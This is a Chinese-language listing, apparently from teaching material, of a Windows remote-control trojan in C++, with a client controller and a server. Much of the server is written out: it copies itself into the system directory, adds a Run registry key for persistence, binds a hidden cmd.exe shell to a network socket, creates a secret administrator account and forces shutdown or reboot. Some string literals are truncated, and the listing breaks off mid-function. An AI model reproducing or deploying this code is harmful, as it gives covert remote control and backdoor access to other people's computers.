程序清单:
Client.cpp // 客户端代码 Server.cpp // 服务器端代码
程序代码及说明: //Client.cpp文件
#include
#include
#pragma comment(lib,\
//将注释wsock32放置到lib文件中,否则需要加载 #define MAXSIZE 2048 //每次可以接收的最大字节
#define SEND_PORT 2000 //与木马程序连接的端口为2000 struct sockaddr_in ClientAddr; //对方的地址端口信息
SOCKET sock; //定义套接字变量,为全局变量 DWORD startSock() //建立套接字功能模块 { WSADATA WSAData; //将WSAData的数据类型声明为WSADATA if(WSAStartup(MAKEWORD(2,2),&WSAData)!=0) { //MAKEWORD(2,2)预定义Winsock版本,初始化套接字 printf(\ return(-1); } sock = socket(AF_INET, SOCK_STREAM, 0); //连接对方 return 1; }
int main(int argc, char *argv[]) { u_int numbyte; char buf[MAXSIZE]; //传送数据的缓冲区 char ip[100]; cout<<\请输入要连接的IP地址\ cin>>ip; startSock();//调用建立套接字功能函数 ClientAddr.sin_family = AF_INET; //协议类型是INET ClientAddr.sin_port = htons(SEND_PORT); //连接对方2000端口 ClientAddr.sin_addr.s_addr = inet_addr(ip); //连接对方的IP地址 connect(sock, (struct sockaddr *)&ClientAddr,sizeof(struct sockaddr)); printf(\远程控制木马程序菜单-------------\\r\\n\ printf(\ --建立Windows系统的秘密帐号\\r\\n\ printf(\ --关闭Windows计算机\\r\\n\ printf(\ --重新启动Windows计算机\\r\\n\ printf(\ --关闭光驱\\r\\n\ printf(\ --打开光驱\\r\\n\
1
printf(\ --建立cmd进程\\r\\n\ printf(\ --退出系统\\r\\n\ printf(\ while(1) { buf[0] = '\\0'; scanf(\输入控制指令 int iLen = strlen(buf); buf[iLen] = 0xa; buf[iLen+1] = '\\0';//要求控制指令串最后为回车符,以示结束 numbyte=send(sock, buf, strlen(buf), 0);//发出控制指令 if(numbyte==SOCKET_ERROR) { closesocket(sock); break; } numbyte=recv(sock, buf, MAXSIZE, 0);//接收服务端发来的提示符 if(numbyte==SOCKET_ERROR) { closesocket(sock); break; } buf[numbyte] = '\\0'; printf(\显示服务端发来的提示符 if(strcmp(buf, \ { closesocket(sock); return 0; } } return 0; }
//Server.cpp文件
#include
#include
#include
//将注释wsock32放置到lib文件中,否则需要加载
#pragma comment(lib,\光驱控制函数mciSendString()所需的库 #define RECV_PORT 2000 //木马服务端对外响应的端口 #define PATH 200 //程序自启动的最大路径 SOCKET sock1,sock2;
//sock1为服务端程序自身建立的套接字
//sock2为服务端与客户端建立响应后的套接字 int g1;
char Buff[1024],cmd[1024];//缓冲区
2
DWORD startSock() //建立套接字功能模块 { WSADATA WSAData; //将WSAData的数据类型声明为WSADATA if(WSAStartup(MAKEWORD(2,2),&WSAData)!=0) { //MAKEWORD(2,2)预定义Winsock版本,初始化套接字 printf(\ return(-1); } sock1 = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0); //建立套接字,为TCP/IP、流式格式 struct sockaddr_in serverAddr; //保存套接字地址的结构体 serverAddr.sin_family = AF_INET; //规定使用IPv4协议 serverAddr.sin_port = htons(RECV_PORT); //响应端口 serverAddr.sin_addr.s_addr=ADDR_ANY; //建立IP地址,ADDR_ANY可使用任意IP地址连接 g1=bind(sock1,(sockaddr *)&serverAddr,sizeof(serverAddr)); //绑定端口与套接字 g1=listen(sock1,5);//等待监听,最大可接受5个连接请求 int serverAddrSize = sizeof(serverAddr); sock2=accept(sock1,(sockaddr *)&serverAddr,&serverAddrSize); //如果客户请求2000端口,接受连接,并返回sock2套接字 return 1; }
int cmdshell(SOCKET sock) //建立cmd进程功能模块 { STARTUPINFO startinfo; //控制进程的主窗口的显示方式 ZeroMemory(&startinfo,sizeof(startinfo)); startinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES; // 决定本结构的每一个成员是否起作用 startinfo.wShowWindow = SW_HIDE;//窗口显示模式,隐藏格式 startinfo.hStdInput = startinfo.hStdOutput = startinfo.hStdError = (void *)sock; //标准输入输出管道 char cmdsystem[] = \进程 PROCESS_INFORMATION ProcessInformation;// 指向进程信息结构的指针 int g2; //下面为建立进程过程 g2=CreateProcess(NULL,cmdsystem,NULL,NULL,1,0,NULL,NULL,&startinfo,&ProcessInformation); //建立一个cmd.exe进程与相应的输入输出管道 WaitForSingleObject(ProcessInformation.hProcess, INFINITE);//等待子进程退出 TerminateProcess(ProcessInformation.hProcess, 0); //在一个子进程中强制结束其他的进程 CloseHandle(ProcessInformation.hProcess);//关闭子进程句柄 return 1; }
DWORD startExeFile() //自启动程序功能模块
3
{ char ExeFile[PATH]; //木马程序缓冲区 char TempPath[PATH];//系统目录缓冲区 int g3; GetModuleFileName(NULL,ExeFile,PATH);//得到当前文件名 GetSystemDirectory(TempPath ,PATH); //得到系统目录 strcat(TempPath,\拷贝到系统文件夹名为server.exe g3 = CopyFile(ExeFile, TempPath, FALSE); HKEY key;//关键字句柄 if( RegOpenKeyEx( HKEY_LOCAL_MACHINE, \ 0, KEY_ALL_ACCESS, &key ) == ERROR_SUCCESS) {//创建和打开一个关键字 RegSetValueEx(key,\ // 在RUN键下建立一个server键,为该木马的路径 RegCloseKey(key); //关闭并保存 } return 1; }
DWORD Open_CDROM()//打开光驱程序功能模块 { mciSendString(\ //多媒体控制函数 return 1; }
DWORD Close_CDROM()//关闭光驱程序功能模块
{ mciSendString(\//多媒体控制函数 return 1; }
DWORD shutdownwin2k()//关闭Win2K程序功能模块 { HANDLE hToken; TOKEN_PRIVILEGES tkp; // Windows2K中需要设置调用进程的权限,当获取该权限后才能关闭计算机的操作 OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken); LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; // 设置一个权限 tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0); ExitWindowsEx(EWX_SHUTDOWN |EWX_FORCE, 0); return 1; }
DWORD shutdownwin98()//关闭Win98程序功能模块 { ExitWindowsEx(EWX_SHUTDOWN | EWX_FORCE,0); return 1; }
DWORD resetwin98()//重新启动Win98程序功能模块 { ExitWindowsEx(EWX_REBOOT |EWX_FORCE,0); return 1;
4
}
DWORD resetwin2k()//重新启动Win2K程序功能模块 { HANDLE hToken; TOKEN_PRIVILEGES tkp; // Windows2K系列,需要设置调用进程的权限,获得权限才能进行重新启动计算机的操作 OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken); LookupPrivilegeValue(NULL,SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid); tkp.PrivilegeCount = 1; // 设置一个权限 tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0); ExitWindowsEx(EWX_REBOOT | EWX_FORCE, 0); return 1; }
DWORD adduser()//建立秘密帐号程序功能模块 { WinExec(\ //建立秘密帐号:yaoxiangwen为用户帐号,0123456789为密码 return 1; }
//下面为主函数,通过调用各个功能模块来实现木马功能 int main() { startExeFile();// startSock() ; unsigned long ByteRead = 0; while(1) { send(sock2,\远程控制系统,请输入你的选择!\\n\\rcmd>\欢迎进入木马远程控制系统,请输入你的选择!\\n\\rcmd>\ ZeroMemory(cmd,1024); //初始化cmd[]缓冲区,用来装客户端发来的指令 ByteRead = 0; //接收客户端发来的指令字节数 while(ByteRead<200) //下面是接收客户端发来控制字程序段 { if(recv(sock2,Buff,1,0)==SOCKET_ERROR)//控制字在Buff缓冲区中 { closesocket(sock2); return 0; } cmd[ByteRead]=Buff[0]; if(Buff[0]==0xa || Buff[0]==0xd) { //如果控制字最后是回车符表示结束标志,cmd[]数组最后一位为0 cmd[ByteRead]=0; break; } ByteRead++; //指令字节计数 }